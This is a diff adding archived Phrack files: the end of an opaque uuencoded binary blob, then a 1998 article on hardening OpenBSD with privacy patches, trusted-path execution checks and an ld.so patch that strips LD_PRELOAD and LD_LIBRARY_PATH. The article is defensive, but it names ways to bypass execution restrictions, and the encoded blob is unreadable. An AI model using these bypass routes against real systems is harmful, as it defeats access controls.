+M#M/`@9/`81HX<!(X3`,'3@*':>#`2>`P#1PX"1RF@0,G@<,T<.`D<)@&#IP$
+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
+*_Q^B7>1`!GX9`'-L
+`
+end
+<-->
+
+----[  EOF
diff --git a/phrack54/6.txt b/phrack54/6.txt
new file mode 100644
index 0000000..b2b7a04
--- /dev/null
+++ b/phrack54/6.txt
@@ -0,0 +1,1399 @@
+---[  Phrack Magazine   Volume 8, Issue 54 Dec 25th, 1998, article 06 of 12
+
+
+-------------------------[  The Belt And Suspenders Approach (September 1998)
+
+
+--------[  route|daemon9 <route@infonexus.com>
+
+
+
+----[  Introduction and Impetus
+
+
+The OpenBSD project team.  Purveyors of a FREE, multi-platform 4.4BSD-based
+UNIX-like operating system.  Their efforts place emphasis on portability,
+standardization, correctness, security, and cryptography.  And OpenBSD
+really concentrates on those last two.  OpenBSD is simply the best choice
+for multi-user environments.
+
+It is the flawed assumption that security mechanisms can be adequately
+provided in layers above the operating system.  A perfect security application
+cannot make up for flawed or absent security features within the OS kernel.
+It is the classic example of building a castle on a swamp.  You can build
+a strong fortress, but it makes no difference if it slowly sinks into the
+ground.  In this article, we retrofit the OpenBSD kernel with some additional
+security.
+
+This article is about cracking the whip.  It's a prime example of security
+being (possibly) inconvenient.  But by making things potentially a bit more
+difficult for normal users, we hope to severely hamper would-be attackers.
+Two effective ways of doing this are through limited program execution via
+path and credential checks and privacy restrictions.
+
+This article is a follow-up to my P52-06 article on hardening the Linux
+kernel.  Herein the reader will find several patches designed to harden a
+multi-user OpenBSD box.  These patches can be broken down into two areas:
+privacy restriction and execution restriction (more on these below).  The
+patches contained here should be used in conjunction with a savvy for
+intelligent administration; if you can't recompile a kernel, stop here.
+
+
+----[  Getting Sources
+
+You will need an OpenBSD 2.4 box with full kernel sources for your
+architecture and sources for the following programs: w, who, ps, fstat, and
+ld.so.  Below are sample instructions for getting the sources you'll need
+through anonymous CVS.
+
+I.      Pick a server and set the appropriate environment variables:
+            (assuming csh or tcsh)
+            1. setenv CVSROOT anoncvs@anoncvs3.usa.openbsd.org:/cvs
+            2. setenv CVS_RSH /usr/local/bin/ssh
+            3. cd /usr
+
+II.     Get the sources:
+            1. cvs get src/usr.bin/fstat
+            2. cvs get src/bin/ps
+            3. cvs get src/usr.bin/w
+            4. cvs get src/usr.bin/who
+            5. cvs get src/gnu/usr.bin/ld/
+            6. cvs get src/lib/libc/stdio/
+
+III.    If you need kernel sources:
+            (for i386-based machines, other architectures vary slightly)
+            1. cvs get ksrc-i386 ksrc-common
+
+
+----[  Privacy Patches
+
+Tested on:  2.4-SNAP (Current as of 12.10.98)
+Author:     route
+
+Why should we allow anyone to be able to view information on processes they do
+not own?
+
+Normally, when a process wants system-wide process table information, it
+retrieves it from the kernel virtual memory interface by making calls to a
+kvm_*(3) derivative.  All that is required is that the process have
+permissions to read from /dev/kmem (usually meaning the program file needs to
+be sgid kmem).  I am of the school of thought that, unless you are really
+cool, you don't need to see everyone else's processes on a host.  The
+privacy patches work towards this end.
+
+
+----[  Privacy Patches Modus Operandi
+
+Simple credential check.  Before the command is allowed to dump savory
+information, a UID check is made.  If you're not root, you're not going to
+see other users' information.  Due to the somewhat lazy way this is
+implemented, a savvy hacker could defeat this.  I leave this as an exercise to
+the reader.
+
+
+----[  Privacy Patches Installation
+
+I.      Extract the code from this article:
+            1. extract P54-06
+            2. cd PP/
+
+II.     Apply the userland diffs:
+            1. cp Patch/PP-diff /usr/src
+            2. cd /usr/src
+            3. patch < PP-diff
+
+III.    Next, cd to the relevant directories and build the executables:
+            1. cd usr.bin/fstat; make; make install
+            2. cd usr.bin/who; make; make install
+            3. cd usr.bin/w; make; make install
+            4. cd bin/ps; make; make install
+
+
+----[  Trusted Path / ACL Execution Patches
+
+Tested on:  2.4-SNAP (Current as of 12.10.98)
+Author:     route
+
+Why should we allow arbitrary code execution rights?
+
+Before any call to sys_execve() is allowed to proceed, we take the vnode of
+the parent directory that the targeted file lives in and grab the file
+attributes via the VOP_GETATTR() macro.  We then check to see if the path
+is trusted (root owned directory that isn't group or world writable) and,
+barring that, we check to see if the user is trusted (on the kernel's trust
+list).  If the last check fails, the file is denied execution privileges.
+
+Oops!  By setting certain environment variables, users can still preload
+libraries and modules filled with all sorts of arbitrary code.  This is a
+no-no.  To prevent this, we provide a mechanism to effectively ignore
+LD_PRELOAD and LD_LIBRARY_PATH environment variables.
+
+
+----[   TPE Implementation Overview
+
+The tpe suite consists of 4 components: the in-kernel mechanisms, a system
+call, a userland agent and an ld.so component.  The kernel resident components
+handle the path and credential verification as well as list maintenance.
+The system call is the vessel used to convey information from userland to
+the kernel and vice versa.  The userland agent consists of the tpe
+administrative program used to manipulate the trust list (and enable/disable
+the ld.so environment checker).  The ld.so piece is responsible for grooming
+the environment of any illegal variables.
+
+
+----[  TPE Trust List Kernel Interface and Abstract Data Types
+
+The trust list inside the kernel is a static array of type `uid_t`.  The
+decision was the made to use a static array to hold the trusted IDs for both
+convenience and runtime efficiency.  By default, the list is elements long.
+If this for some reason is not sufficient, it can be increased by changing the
+CPP symbolic constant TPE_ACL_SIZE (however, you should first probably ask
+yourself why you need more than 80 trusted users).
+
+The speed in which user ID verification is done is absolutely essential, as
+this check will be done for every call to exec that does not originate from a
+trusted path.  This has the potential to be a huge bottle neck.  This was
+taken into consideration and the bulk of processing overhead is offloaded to
+list initialization and modification.
+
+The list is kept ordered after all insertions and deletions via insertion sort.
+Sorting is relatively costly (insertion sort has a running time of about
+O(n^2)) and is done when response time is not absolutely critical, during list
+additions and deletions.
+
+Speed is essential when the lookups are done, and, since the list is ordered,
+a binary search can be done in a worst case of O(lg N).  In fact, with the
+default list size of 80 elements, we can be guaranteed no more than 7
+comparisons will be done.  Compare that with a sequential search in an
+ordered list which has a worst case of O(N) (80 comparisons).
+
+
+----[  TPE ld.so protection
+
+The dynamic linker is a great tool that allows us to write small programs 
+that load external code at runtime.  On a macro scale, ld.so allows processes
+to load arbitrary external code for execution.  This can be used to bypass
+our execution restrictions.  A user could bypass path trust by simply loading
+code dynamically via library or object code redirection.  This is against
+our best interests.  To prevent this, we patch ld.so to strip the
+LD_PRELOAD and LD_LIBRARY_PATH environment variables.
+
